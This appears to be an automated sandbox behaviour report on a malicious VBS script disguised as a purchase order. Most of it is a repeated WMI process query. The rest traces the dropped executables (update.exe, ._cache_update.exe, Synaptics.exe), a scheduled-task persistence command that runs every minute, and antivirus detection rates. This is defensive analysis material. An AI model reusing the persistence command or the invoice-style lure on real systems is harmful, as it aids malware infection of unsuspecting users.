                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: Purchase Order Summary Details.vbsVirustotal: Detection: 42%
                              Source: Purchase Order Summary Details.vbsReversingLabs: Detection: 26%
                              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs"
                              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7792 -s 4704
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7792 -s 3044
                              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbsJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
